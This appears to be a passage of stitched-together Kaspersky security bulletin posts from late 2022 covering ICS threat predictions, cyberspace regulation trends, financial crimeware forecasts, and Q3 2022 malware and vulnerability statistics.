  • Digitalization in a race for higher efficiency – IIoT and SmartXXX (including predictive maintenance systems and digital twin technology) leads to significantly increased attack surfaces. This is confirmed by the attack statistics on CMMS (Computerized Maintenance Management Systems).

    Top 10 countries ranked by the percentage of CMMS attacked in H1 2022:

    It is significant that in this Top 10 ranking by the percentage of attacked CMMS in H1 2022 we see the traditionally ‘secure’ countries which are not seen in rankings based on the overall percentage of OT computers attacked in the country or based on the percentage of attacked OT computers by sector.

  • Rising energy carrier prices and the resulting rises in hardware prices, on the one hand, will force many enterprises to abandon plans to deploy on premise infrastructure in favor of cloud services from third party vendors (which increases IS risks). In addition, this will negatively impact budgets allocated for IT/OT security.
  • The deployment of various unmanned vehicles and units (trucks, drones, agricultural equipment and so forth), which can be abused as either targets or tools for attacks.
Most noteworthy techniques and tactics in future attacks

Let’s not indulge in any fantastic suppositions about tactics and techniques used by the most advanced attackers, such as APTs connected to intelligence agencies in leading countries, as we can then be waylaid by unexpected twists and turns. Let’s also not discuss the tactics and techniques used by the numerous threat actors at the other end of the spectrum – the least qualified ones, since it is unlikely that they will come up with something interesting or new, and the security solutions already in place at most organizations can effectively block their attacks.

Let’s focus instead on the middle of the spectrum – the techniques and tactics used by the more active APT groups, whose activity is usually ascribed as being in line with the interests of countries in the Middle East and the Far East, as well as being used by more advanced cybercriminals, such as ransomware gangs.

Based on our experience of investigating such attacks and the related incidents, we believe that ICS cybersecurity specialists need to focus on the following tactics and techniques:

  • Phishing pages and scripts embedded on legitimate sites.
  • The use of Trojanized “cracked” distribution packages, “patches” and key generators for commonly used and specialist software (this will be stimulated by rising license costs and the departure of vendors from certain markets due to political pressure).
  • Phishing emails about current events with especially dramatic subjects, including events the root causes of which are political in nature.
  • Documents stolen in previous attacks on related or partner organizations being used as bait in phishing emails.
  • The distribution of phishing emails disguised as legitimate work correspondence via compromised mailboxes.
  • N-day vulnerabilities – these will be closed even more slowly as security updates for some solutions will become less accessible.
  • Exploiting foolish configuration errors (such as failing to change default passwords) and zero-day vulnerabilities in products from ‘new’ vendors, including local ones. Mass rollouts of such products are inevitable, despite the serious doubts about the developers’ security maturity.

For instance, recommendations such as “enter password xyz in the password field” can be found in installation instructions and user manuals in a surprising number of products from small ‘local’ vendors. Furthermore, you will rarely find information about vulnerabilities inherited from common components and OEM technologies on such vendors’ websites.

  • Exploiting inherent security flaws in cloud services from ‘local’ service providers and government information systems (see above).
  • Exploiting configuration errors in security solutions. This includes the possibility of disabling an antivirus product without entering an administrator password (antivirus is almost useless if an attacker can easily disable it). Another instance would be the weak security of the IS solution centralized management systems. In this case, IS solutions are not only easy to bypass, but they can also be used to move laterally – for instance to deliver malware or to gain access to ‘isolated’ network segments and to bypass access control rules.
  • Using popular cloud services as CnC – even after an attack is identified, the victim might still be unable to block it because important business processes could depend on the cloud.
  • Exploiting vulnerabilities in legitimate software, for instance, using DLL Hijacking and BYOVD (Bring Your Own Vulnerable Driver) to bypass endpoint security solutions.
  • Distributing malware via removable media to overcome air gaps, in those instances where air gaps actually do exist.
Some final thoughts

When writing about potential future issues, we did not aim to describe a full set of potential threats. Instead, we attempted to convey the impression of a global character of upcoming developments and to encourage our readers to assess those issues (including similar ones not mentioned specifically in this paper) which are most relevant to their organization.

We included only those developments and described only those risks which we believe to be most widespread and generally applicable to many organizations in many countries. Therefore, we kept the predictions less specific on purpose.

Only you can determine which threats are relevant for you. Naturally, if you need some assistance with this rather complicated task, we are always ready to help.

Our predictions are the sum of the opinions of our entire team based on our collective experience in researching vulnerabilities and attacks and investigating incidents, as well as our personal vision of the main vectors driving changes in the threat landscape. We will be very glad if any of our negative predictions do not come true in 2023.

We are always happy to discuss our ideas and we welcome your questions at ics-cert@kaspersky.com.

Policy trends: where are we today on regulation in cyberspace?

22 Listopad, 2022 - 09:00

This is the first edition of our policy analysis and observations of trends in the regulation of cyberspace, and cybersecurity, within the Kaspersky Security Bulletin.

This year so far has been very challenging: increased tensions in international relations have had a huge impact on both cyberspace and cybersecurity. Further to this, we share below our key observations regarding the trends we believe have been the highlights of this year and have the potential to shape the future of cyberspace in the year ahead.

#1 Fragmentation shifting to polarization: governments and multistakeholder communities are all the more divided — and have formed into groups based on like-mindedness

The previously observed and discussed fragmentation of cyberspace on the whole — and the internet in particular (also referred to as the ““splinternet” or the balkanization of the internet) — is taking on a new form. In the past we observed the first signs of governments’ diverging views on how cyberspace and cybersecurity should be regulated. Although by no means all governments stepped into this arena, the few countries that did managed to establish initial laws with extraterritorial effect (such as the EU’s GDPR, which established extraterritorial requirements for many organizations outside the EU) that produced a far larger impact beyond their national borders.

The year 2022, however, has overhauled the existing fragmentation: it does still exist, but only among the emerging alliances of the like-minded, covering not only governments but also non-state actors. The war in Ukraine has further deepened polarization between different groups of states and communities. The biggest challenge stems from the IT security community (which traditionally sticks together and is supposed to act as “neutral firefighters” in cyberspace) splitting into separate closed groups as well. For example, the global Forum of Incident Response and Security Teams (FIRST) suspended all member organizations originating from Russia or Belarus, thereby undermining the fundamental principle of trust in cybersecurity. Such a decision also prevents further threat information exchange between those in charge of responding to cyberincidents. Perhaps naturally, this has triggered talk among those left out regarding launching their own alternative communities.

The growing polarization in cyberspace poses a security risk for many of us, given the borderless nature of the threats and incidents we face. Even when the initial intention of threat actors is to target a particular organization, this can easily spill over to many others in ICT supply chains, going far beyond the initial target (as already occurred with, for example, WannaCry). Will organizations from different jurisdictions be able to exchange threat information with each other, and will they be able to cooperate across borders for incident response? Some of them will, but overall more and more barriers are emerging to this, creating security risks.

#2 Tech localization and “digital sovereignty” is no longer just about data

Globalization is still with us in 2022, but it’s becoming less popular: there’s a move toward buying local or domestic products because it could be safer. Unfortunately, cyberspace and the tech sector have already become one more arena for economic and geostrategic competition among states, while vaguely-defined (most likely intentionally so) concepts about “digital sovereignty”, “data sovereignty”, “strategic autonomy”, etc. are discussed more in different communities — from decision-makers to the media. Though initially perceived as attempts by governments to regulate and protect data (after the first data localization laws appeared), this now has the potential to affect far more areas, including microchip and other hardware manufacturing and software development. In some critical sectors of cybermature jurisdictions this already exists: mostly domestic companies are preferred for procurement. But could it expand further into the consumer market?

If so, in a global context, widespread application of data localization rules in particular would most likely create challenges for cybersecurity (i.e., for better and more effective threat intelligence to fight cyberthreats). With less visibility into the cyberthreat landscape, the lower the chances of developing effective detection tools or producing high-quality threat intelligence. These risks will increase if more and more countries impose data localization rules on their markets.

Thus, a dilemma could arise where attempts to provide more cybersecurity through strengthening data security, on the one hand, may actually lead to weaker cybersecurity (from less visibility and threat intelligence), on the other. The solution could lie in developing smart regulation approaches as well as defining clear security criteria for vendors to be trusted enough for cyberthreat-related data processing.

#3 Do cyberdiplomacy and international cybersecurity still exist? If so, they’ve taken a back seat this year

Kaspersky has been actively involved in many multistakeholder initiatives to advance cyberdiplomacy, including at the UN and regional levels. Subjectively speaking, 2022 has seen the discussion of cyberdiplomacy and international cybersecurity become less widespread and profound. What does this mean? The war in Ukraine and ongoing tensions in international relations have placed onto the agenda issues about security in its conventional sense, where cyber is just one of its aspects. What will happen next is hard to predict, but if military action continues, cyberdiplomacy will most likely stay sat firmly on the back seat; however, it’s to be hoped that it won’t disappear completely.

#4 Full-blown cyberwar hasn’t occurred, and this is of course good news. But we seem to be facing a more complex challenge — hybrid operations

Cyber Armageddon hasn’t occurred. Though many experts predicted it, it hasn’t materialized in the current war in Ukraine. This is good news, for sure. At the same time, unfortunately, the unfolding events have shown that cyberweapons are being used in the conflict to create hybrid warfare, where actions take place both in the digital realm (including with data manipulation and misinformation operations) and on the ground. The challenge is that the international community hasn’t developed clear responses to deal with this, and most likely any technological and technical solutions will be insufficient.

#5 Liability of digital products: a new area in future regulatory efforts

Safety and security labels don’t exist yet for software. And where a vulnerability may create security or safety risks, users may wonder whom to reach out to for liability issues. So far, different vertical legislative approaches do provide solutions for consumers, such as personal data protection laws for cases where personal data has been affected. The financial and banking sector is well-regulated too. But what about a mass-market photo-editing app that can be exploited by stalkerware? Should the developer be responsible? Some jurisdictions apparently already have the answer. The EU — as a norm-setter — has been among the first to propose a game-changing draft law titled the Cyber Resilience Act, with proposed fines as high as those in the GDPR. And in the U.S. there have been some first attempts to define baseline criteria for cybersecurity labeling of consumer software, as discussed in a separate blog post. Most likely, next year and beyond, other governments will find the regulation of software development liability a good idea, and we could well see even further fragmentation as a result of the different approaches taken among states.

Crimeware and financial cyberthreats in 2023

22 Listopad, 2022 - 09:00

A look back on the year 2022 and what to expect in 2023

Every year, as part of the Kaspersky Security Bulletin, we predict which major trends will be followed in the coming year by attackers, who target financial organizations. The predictions, based on our extensive experience, help individuals and businesses improve their cybersecurity and prevent the vast range of possible risks.

As the financial threat landscape has been dramatically evolving over the past few years, with the expansion of such activities as ransomware or cryptofraud, we believe it is no longer sufficient to look at the threats to traditional financial institutions (like banks), but rather assess financial threats as a whole. The cybercriminal market has been developing extensively, with the overwhelming majority of cybercriminals pursuing one goal — financial profit, no matter the source. However, the way they do it varies from year to year, and understanding the changes in their tactics and tools can help organizations improve their security.

This year, we have decided to adjust our predictions accordingly, expanding them to encompass crimeware developments and financial cyberthreats as a whole.

This report assesses how accurately we predicted the developments in the financial threats landscape in 2022 and ponder at what to expect in 2023.

Analysis of forecasts for 2022
  • Rise and consolidation of information stealers. Our telemetry shows an exponential growth in infostealers in 2021. Given the variety of offers, low costs, and effectiveness, we believe this trend will continue. Additionally, they might even be used as bulk collectors for targeted and more complex attacks.

    Yes. While we haven’t seen exponential growth in the use of stealers, their advancement and evolution has been very noticeable. In 2022, we uncovered some new malicious families actively sold on dark markets, such as Rhadamanthys, BlueFox, and Parrot, stealing sensitive information from the victims’ devices. One of the most striking new stealers has been OnionPoison. Unlike common stealers, this malware gathered data that can be used to identify the victims, such as browsing histories, social networking account IDs and Wi-Fi networks. Previously discovered stealers have not been left behind. This year we observed the updates of AcridRain and Racoon stealers, and the remarkable evolution of RedLine stealer, making it a self-spreading threat that attacks gamers via YouTube. Also of note in 2022 are campaigns impersonating well-known software brands like Notepad++. The trend remains solid, and these types of campaigns impact a large number of users, hitting the target brand’s bottom line. Moreover, the ransomware gang ransomExx also abuses open source software by recompiling it to load a malicious shellcode; Notepad++ was also used in one of their attacks.

    While there are still top-level threats that are not distributed openly, the vast majority of stealers have become more affordable and cheaper for average cybercriminals, making this threat more likely to evolve even more in the following year.

  • Cryptocurrency targeted attacks. The cryptocurrency business continues to grow, and people continue to invest their money in this market because it’s a digital asset and all transactions occur online. It also offers anonymity to users. These are attractive aspects that cybercrime groups will be unable to resist. And not only cybercrime groups, but also state-sponsored groups who have already started targeting this industry. After the Bangladesh bank heist, the BlueNoroff group is still aggressively attacking the cryptocurrency business, and we anticipate this activity will continue.

    Despite these uncovered campaigns, attackers were still more likely to hunt for cryptocurrency using phishing, offering dubious cryptocurrency exchange platforms, and launching cryptojacking to illicitly mint cryptocurrency. Previously, mining was mostly a threat for general users, but today miners are stealing power from large businesses and critical infrastructures. Even big ransomware operators, for example, AstraLocker, are shutting down their operations to switch to cryptojacking.

  • More cryptocurrency-related threats: fake hardware wallets, smart contract attacks, DeFi hacks, and more. In the scramble for cryptocurrency investment opportunities, we believe that cybercriminals will take advantage of fabricating and selling rogue devices with backdoors, followed by social engineering campaigns and other methods to steal victims’ financial assets.

    Yes. In 2022, we observed many other cryptocurrency-related threats potentially costing users millions of dollars. Since the start of 2022, cybercriminals have stolen $3 billion from DeFi protocols, with 125 crypto hacks in total. According to the freshest data on DeFi, every hour 15 newly deployed scams against smart contracts are detected. At this rate, 2022 will likely surpass 2021 as the biggest year for hacking on record. The lack of state-of-the-art security for smart contracts leads to attacks on these platforms and, based on how the business model works, the potential theft of a lot of money.

  • Targeted ransomware — more targeted and more regional. With the international efforts to crack down on major targeted ransomware groups, we will see a rise in small, regionally derived groups focused on local The adoption of Open Banking in more countries may lead to more opportunities for cyberattacks.

    Yes. We’ve observed a rise in the number of targeted and regional ransomware attacks. One of the reasons why ransomware attacks have become more regional is the decrease in collaboration between ransomware groups. In the past, many actors would join forces to attack and encrypt as many organizations around the world as possible. But thanks to international efforts, such as No More Ransom, to crack down on their work, global attacks have become much rarer.

    Interestingly, this trend was also influenced by geopolitical conflict, which we did not anticipate last year. Many ransomware groups took sides in the conflict between Russia and Ukraine, focusing their activities on destructive attacks or limiting the range of their targets by geography. The most significant reaction of all was likely by the Conti ransomware group, who announced that it would retaliate with full capabilities against any “enemy’s” critical infrastructure if Russia became a target of cyberattacks. On the other side, Kaspersky discovered Freeud, a wiper under the guise of ransomware whose creators proclaimed support for Ukraine.

  • Access broker specialists — professionalize access to compromised networks. Instead of major efforts to compromise access to a corporate or public entity, we can expect Ransomware-as-a-Service operators to seek to buy access to another cybercriminal group that already has access to the target, focusing their activity on ransomware deployment.

    Yes. Attackers have indeed resorted to buying initial access to compromised services more often than hacking it themselves. This has become a real stand-alone business in the dark web (Malware-as-a-Service, MaaS). This year we detected a malicious spam campaign targeting organizations tenfold growth in a month, spreading Emotet malware, which is used by Conti ransomware affiliates to gain initial access. Once access is obtained, the organization is placed into a pool of potential ransomware targets. This growth in the Emotet campaign suggests that the Access-as-a-Service continues to be actively used by cybercriminal groups, and the trend of hiring access broker specialists is likely to continue in 2023.

  • Mobile banking Trojans on the rise. As mobile banking experienced booming adoption worldwide due to the pandemic (in Brazil it represented 51% of all transactions in 2020), we can expect more mobile banking Trojans for Android, especially RATs that can bypass security measures adopted by banks (such as OTP and MFA). Regional Android implant projects will move globally, exporting attacks to Western European countries.

    Yes. Security remains the biggest problem for users who want to make regular mobile payments. As predicted, the number of mobile banking Trojan detections increased considerably in 2022 worldwide compared to the last year, reaching more than 55,000 attacks in the second quarter of 2022 alone. With the rising number of attacks, cybercriminals have evolved new banking Trojans, targeting mobile users. In 2022, Kaspersky researchers have so far discovered more than 190 applications distributing Harly Trojan with more than 4.8 million downloads. While these apps were available in official stores and disguised as legitimate apps, the fraudsters behind them subscribed unsuspecting users to unwanted paid services.

  • Rise of threat to online payment systems. Amid the pandemic, many companies went digital and moved their systems online. And the longer people stay at home because of quarantine and lockdowns, the more they rely on online markets and payment systems. However, this rapid shift is not accompanied by the appropriate security measures, and it is attracting lots of cybercriminals. This issue is particularly severe in developing countries, and the symptoms will last for a while.

    No. This year, we have not observed a lot of new fintech players that went big and which could become new targets for cybercriminals.

  • With more fintech apps out there, the increasing volume of financial data is attracting cybercriminals. Thanks to online payment systems and fintech applications, large amounts of important personal information is stored on mobile. Many cybercrime groups will continue to attack personal mobile phones with evolved strategies such as deep fake technology and advanced malware to steal victims’ data.

    No. Mobile malware techniques haven’t changed much in the course of 2022.

  • Remote workers using corporate computers for entertainment purposes, such as online games, continue to pose financial threats organizations. In a previous post, we wrote that users rely on corporate laptops to play video games, watch movies, and use e-learning platforms. This behavior was easy to identify because there was a boom in the Intel and AMD mobile graphic cards market in 2020-2021 compared to previous years. This trend is here to stay, and while during 2020 46% of employees had never worked remotely before, now two-thirds of them state they wouldn’t go back to the office, with the rest claiming to have a shorter office work week.

    Yes. The level of cybersecurity after the pandemic and the initial adoption of remote work by organizations en masse has become better. Nevertheless, corporate computers used for entertainment purposes remain one of the most important ways to get initial access to a company’s network. Looking for alternative sources to download an episode of a show or a newly released film, users encounter various types of malware, including Trojans, spyware and backdoors, as well as adware. According to Kaspersky statistics, 35% of users who faced threats under the guise of streaming platforms were affected by Trojans. If such malware ends up on a corporate computer, attackers could even penetrate the corporate network and search for and steal sensitive information, including both business development secrets and employees’ personal data.

  • ATM and PoS malware to return with a vengeance. During the pandemic, some locations saw PoS (point of sale) and ATM transaction levels drop significantly. Lockdowns forced people to stay at home and make purchases online, and this was mirrored in PoS/ATM malware too. As restrictions are lifted, we should expect the return of known PoS/ATM malware and the appearance of new projects. Cybercriminals will regain their easy physical access to ATMs and PoS devices at the same time as customers of retailers and financial institutions.

    Yes. As predicted, with the lift of COVID-19 restrictions, attackers have stepped up their activities again in 2022. In the first eight months of the year, the number of unique devices affected by ATM/PoS malware grew by 19% as compared to the same period in 2020, and by nearly 4% compared to 2021. Kaspersky researchers have also discovered cybercriminals creating and deploying new never-seen-before tools targeting ATM and PoS devices. For instance, the Prilex threat group, famous for stealing millions of dollars from banks, has evolved substantially. Specifically, Prilex has upgraded its tools from a simple memory scraper to an advanced and complex malware that now targets modular PoS terminals and is the first malware able to clone credit card transactions, even those protected by CHIP and PIN.

    Perhaps one of the biggest shifts is PoS malware becoming a service sold on the dark web, which means it is now available to other cybercriminals, and the risk of losing money is increasing for businesses worldwide.

Forecasts for 2023 Led by gaming and other entertainment sectors, Web3 continues to gain traction and so will threats for it

With the increasing popularity of cryptocurrencies, the number of crypto scams has also increased. However, we believe that users are now much more aware of crypto and will not fall for primitive scams, such as a video featuring an Elon Musk deepfake promising huge returns in a dodgy cryptocurrency investment scheme that went viral. Cybercriminals will continue to try to steal money through fake ICOs and NFTs along with other cryptocurrency-based financial theft (like exploitation of vulnerable smart contracts), but will make them more advanced and widespread.

Malware loaders to become the hottest goods on the underground market

Many actors have their own malware, but that alone is not enough. Entire samples used to consist solely of ransomware, but the more diverse the modules in a piece of ransomware, the better it will evade detection. As a result, attackers are now paying much more attention to downloaders and droppers, which can avoid detection. This has become a major commodity in the MaaS industry, and there are even already favorites among cybercriminals on the dark web — the Matanbunchus downloader, for example. All in all, stealth execution and bypassing EDRs is what malicious loader developers are going to focus on in 2023.

More new “Red Team” penetration testing frameworks deployed by cybercriminals

At the same time as vendors create and improve penetration testing frameworks to protect companies, crimeware actors are expected to use them much more actively for illegal activities. The most remarkable example of this trend starting to spread globally is Cobalt Strike. The tool is so powerful that threat groups have added it to their arsenal, already using it in a wide variety of attacks and cyberespionage campaigns. In 2022, the news hit the headlines that another pentester toolkit dubbed Brute Ratel C4 had been hacked, and is now being distributed on hacker forums. We predict that, along with the development of new penetration tools, cybercriminals will increasingly use them for their own malicious purposes — and Brute Ratel C4 and Cobalt Strike are just the beginning of this trend.

Ransomware negotiations and payments begin to rely less on Bitcoin as a transfer of value

As sanctions continue to be issued, the markets become more regulated, and technologies improve at tracking the flow and sources of Bitcoin, cybercrooks will rotate away from this cryptocurrency toward other forms of value transfer.

Ransomware groups following less financial interest, but more destructive activity

Perhaps a surprising prediction in a report about future financial threats, yet ransomware has been one of the biggest threats in recent years, inflicting massive financial damage on organizations. As the geopolitical agenda increasingly occupies the attention not only of the public but also of cybercriminals, we expect ransomware groups to make demands for some form of political action, instead of demands for ransom money. One of such examples is Freeud, a brand-new ransomware with wiper capabilities.

IT threat evolution in Q3 2022. Non-mobile statistics

18 Listopad, 2022 - 09:10

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2022:

  • Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
  • Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.
  • Ransomware attacks were defeated on the computers of 72,941 unique users.
  • Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.
Financial threats Number of users attacked by banking malware

In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.

Number of unique users attacked by financial malware, Q3 2022 (download)

TOP 10 banking malware families Name Verdicts %* 1 Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 33.2 2 Zbot/Zeus Trojan-Banker.Win32.Zbot 15.2 3 IcedID Trojan-Banker.Win32.IcedID 10.0 4 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 5.8 5 Trickster/Trickbot Trojan-Banker.Win32.Trickster 5.8 6 SpyEye Trojan-Spy.Win32.SpyEye 2.1 7 RTM Trojan-Banker.Win32.RTM 7.9 8 Danabot Trojan-Banker.Win32.Danabot 1.4 9 Tinba/TinyBanker Trojan-Banker.Win32.Tinba 1.4 10 Gozi Trojan-Banker.Win32.Gozi 1.1

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of financial malware attacks

TOP 10 countries and territories by share of attacked users

Country or territory* %** 1 Turkmenistan 4.7 2 Afghanistan 4.6 3 Paraguay 2.8 4 Tajikistan 2.8 5 Yemen 2.3 6 Sudan 2.3 7 China 2.0 8 Switzerland 2.0 9 Egypt 1.9 10 Venezuela 1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Ransomware programs Quarterly trends and highlights

The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, leaked online. LockBit themselves attributed the leakage to one of their developers’ personal initiative, not the group’s getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy spotted back in May. A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.

Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The former threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter attacked devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.

The United States Department of Justice announced that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely used by the North Korean operators Andariel. The DOJ said victims had started getting their money back.

The creators of the little-known AstraLocker and Yashma ransomware published decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.

Number of new modifications

In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.

Number of new ransomware modifications, Q3 2021 — Q3 2022 (download)

Number of users attacked by ransomware Trojans

In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q3 2022 (download)

TOP 10 banking malware families

Name Verdicts %* 1 Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 33.2 2 Zbot/Zeus Trojan-Banker.Win32.Zbot 15.2 3 IcedID Trojan-Banker.Win32.IcedID 10.0 4 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 5.8 5 Trickster/Trickbot Trojan-Banker.Win32.Trickster 5.8 6 SpyEye Trojan-Spy.Win32.SpyEye 2.1 7 RTM Trojan-Banker.Win32.RTM 7.9 8 Danabot Trojan-Banker.Win32.Danabot 1.4 9 Tinba/TinyBanker Trojan-Banker.Win32.Tinba 1.4 10 Gozi Trojan-Banker.Win32.Gozi 1.1

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of attacked users

TOP 10 countries and territories attacked by ransomware Trojans

Country or territory* %** 1 Bangladesh 1.66 2 Yemen 1.30 3 South Korea 0.98 4 Taiwan 0.77 5 Mozambique 0.64 6 China 0.52 7 Colombia 0.43 8 Nigeria 0.40 9 Pakistan 0.39 10 Venezuela 0.32

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

TOP 10 most common families of ransomware Trojans Name Verdicts* Percentage of attacked users** 1 (generic verdict) Trojan-Ransom.Win32.Encoder 14.76 2 WannaCry Trojan-Ransom.Win32.Wanna 12.12 3 (generic verdict) Trojan-Ransom.Win32.Gen 11.68 4 Stop/Djvu Trojan-Ransom.Win32.Stop 6.59 5 (generic verdict) Trojan-Ransom.Win32.Phny 6.53 6 (generic verdict) Trojan-Ransom.Win32.Crypmod 5.46 7 Magniber Trojan-Ransom.Win64.Magni 4.93 8 PolyRansom/VirLock Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom 4.84 9 (generic verdict) Trojan-Ransom.Win32.Instructions 4.35 10 Hive Trojan-Ransom.Win32.Hive 3.87

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data.
** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans.

Miners Number of new miner modifications

In Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June’s figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.

Number of new miner modifications, Q3 2022 (download)

Number of users attacked by miners

In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.

Number of unique users attacked by miners, Q3 2022 (download)

Geography of miner attacks

TOP 10 countries and territories attacked by miners

Country or territory* %** 1 Ethiopia 2.38 2 Kazakhstan 2.13 3 Uzbekistan 2.01 4 Rwanda 1.93 5 Tajikistan 1.83 6 Venezuela 1.78 7 Kyrgyzstan 1.73 8 Mozambique 1.57 9 Tanzania 1.56 10 Ukraine 1.54

* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by criminals during cyberattacks Quarterly highlights

Q3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let’s begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: CVE-2022-30220, along with CVE-2022-35803 and CVE-2022-37969, both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: CVE-2022-22022, CVE-2022-30206, and CVE-2022-30226. These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation (CVE-2022-22047, CVE-2022-22049, and CVE-2022-22026), while CVE-2022-22038 affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including CVE-2022-22034 and CVE-2022-35750, which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, CVE-2022-34713 and CVE-2022-35743, which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.

Most of the network threats detected in Q3 2022 were again attacks associated with brute-forcing passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library (CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, and CVE-2021-45105) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are CVE-2022-22028, which can lead to leakage of confidential information, as well as CVE-2022-22029, CVE-2022-22039 and CVE-2022-34715, which a cybercriminal can use to remotely execute arbitrary code in the system — in kernel context — by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability CVE-2022-34718, which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the CVE-2022-34724 vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.

Two vulnerabilities in Microsoft Exchange Server, CVE-2022-41040 and CVE-2022-41082, received considerable media coverage. They were collectively dubbed “ProxyNotShell” in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc.

Vulnerability statistics

In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections — 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:

  • CVE-2018-0802 and CVE-2017-11882, in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;
  • CVE-2017-0199, which allows downloading and running malicious script files;
  • CVE-2022-30190, also known as “Follina”, which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;
  • CVE-2021-40444, which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.

Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 (download)

These were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:

  • CVE-2022-2294, in the WebRTC component, which leads to buffer overflow;
  • CVE-2022-2624, which exploits a memory overflow error in the PDF viewing component;
  • CVE-2022-2295, a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;
  • CVE-2022-3075, an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.

Since many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.

A series of vulnerabilities were identified in Microsoft Edge. Worth noting is CVE-2022-33649, which allows running an application in the system by circumventing the browser protections; CVE-2022-33636 and CVE-2022-35796, Race Condition vulnerabilities that ultimately allow a sandbox escape; and CVE-2022-38012, which exploits an application memory corruption error, with similar results.

The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: CVE-2022-38476, a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities CVE-2022-38477 and CVE-2022-38478, which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.

